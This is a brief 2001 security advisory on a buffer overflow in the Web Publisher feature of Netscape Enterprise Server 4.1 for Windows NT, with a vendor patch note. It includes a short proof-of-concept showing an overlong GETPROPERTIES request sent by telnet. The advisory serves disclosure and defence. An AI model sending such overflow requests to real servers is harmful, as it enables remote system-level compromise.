Reported May 16, 2001, by eEye Digital Security.
VERSION AFFECTED
· Netscape Enterprise Server 4.1 for Windows NT
DESCRIPTION
A
vulnerability exists in the Netscape Enterprise Server 4.1 for Windows NT Web
Publisher feature that gives an attacker system-level shell access on the
server. By sending a large buffer containing executable code and a new
instruction pointer, an attacker can gain remote system-level shell access to
the vulnerable server. The overflow exists in how Web Publisher handles the
Uniform Resource Identifier (URI). By specifying GETPROPERTIES,
GETATTRIBUTENAMES, or any other publisher-specific method, an attacker can pass
data into the vulnerable section of the server. See eEye’s Web
site for more details.
DEMONSTRATION
eEye provided the following proof-of-concept scenario:
C:\>telnet www.example.com
80
Connecting To www.example.com... connected.
GETPROPERTIES /(buffer) HTTP/1.1
Host: Hostname
(enter)
(enter)
Where (buffer) is 2000 characters.
VENDOR RESPONSE
The vendor, iPlanet, acknowledges this vulnerability and has released an NSAPI patch to correct this vulnerability. It's further recommended that users apply Service Pack 8 (SP8) when iPlanet makes SP8 available.
CREDIT
Discovered by Riley Hassell.